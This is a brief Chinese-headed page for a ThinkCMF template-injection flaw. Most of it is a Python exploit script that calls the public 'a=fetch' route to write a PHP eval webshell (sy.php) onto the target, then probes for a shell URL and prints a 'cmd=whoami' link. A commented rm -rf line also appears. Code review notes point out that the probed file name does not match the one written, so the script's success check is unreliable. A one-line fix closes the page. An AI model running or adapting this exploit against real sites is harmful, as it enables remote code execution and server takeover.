eval 漏洞处理
Python3 攻击脚本
仓库地址:https://github.com/jas502n/ThinkCMF_getshell/tree/master
import requests,sys,json
def ThinkCMF_getshell(url):
    """Send the ThinkCMF ``a=fetch`` template-injection request to ``url``.

    The request abuses the publicly routable ``fetch`` controller method
    (see the fix section below: ``fetch``/``display`` should be
    ``protected``) to have the server evaluate a ``<php>…</php>`` block.
    On an HTTP 200 the ``Server`` and ``X-Powered-By`` headers are printed
    and ``check_shell`` is called; any other status prints a "not
    vulnerable" message.

    Args:
        url: Base URL of the target, with or without a trailing slash.

    Detection note: the request is a plain GET to ``index.php`` with
    ``a=fetch`` and a ``<php>`` tag inside the ``content`` parameter, which
    is a usable WAF / access-log indicator for this bug class.
    """
    # Normalise away a single trailing slash so the path below joins cleanly.
    if url[-1] == '/':
        url = url[0:-1]
    else:
        url = url
    # Raw string: the ``content`` value is URL-encoded PHP that writes a file named ``sy.php``.
    vuln_url = url + R'''/index.php?a=fetch&content=<php>file_put_contents('sy.php','%3C%3Fphp%20eval%28%24_POST%5B%22x%22%5D%29%3B')</php>'''
    r = requests.get(vuln_url)
    # NOTE(review): response_str is only referenced by the commented-out
    # check below, so it is currently dead work (and relies on a private
    # attribute of the headers object).
    response_str = json.dumps(r.headers.__dict__['_store'])
    # if r.status_code == 200 and 'PHP' in response_str:
    # NOTE(review): a bare 200 does not prove the injection ran — the
    # headers are printed and check_shell() is called on any 200 response.
    if r.status_code == 200:
        print(r.headers.get('Server'))
        print(r.headers.get('X-Powered-By'))
        check_shell(url)
    else:
        print("No Exit ThinkCMF Vuln")
def check_shell(url):
    """Probe ``<url>/0a30e0d61182dbb7c1eed5135787fb84.php`` and report it if present.

    Prints a "Shell url" line only when the probe returns HTTP 200 and the
    response body contains the same hash-like string.

    Args:
        url: Base URL of the target, already stripped of its trailing slash
            by the caller.

    NOTE(review): the file name probed here is not the one the ``fetch``
    payload in ``ThinkCMF_getshell`` writes (``sy.php``), so a hit here is
    independent of that request and says nothing about whether it worked.
    """
    shell_url = url + '/0a30e0d61182dbb7c1eed5135787fb84.php'
    r = requests.get(shell_url)
    # ``decode()`` defaults to strict UTF-8 and will raise on a non-UTF-8 body.
    if r.status_code == 200 and '0a30e0d61182dbb7c1eed5135787fb84' in r.content.decode():
        print("\n>>>>>>>Shell url:")
        print(url + "/0a30e0d61182dbb7c1eed5135787fb84.php?cmd=whoami")
    # print url + "/0a30e0d61182dbb7c1eed5135787fb84.php?cmd=rm -rf 0a30e0d61182dbb7c1eed5135787fb84.php"
if __name__ == '__main__':
    # Expect exactly one positional argument: the target base URL.
    # Otherwise exit with a usage line built from the script name.
    argv = sys.argv
    if len(argv) == 2:
        url = argv[1]
        ThinkCMF_getshell(url)
    else:
        sys.exit("\n[+] python %s http://x.x.x.x/" % argv[0])
修复方法
将 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的访问修饰符改为 protected,这样它们就不再是可以通过 URL(如上面脚本中的 a=fetch)直接调用的公开方法。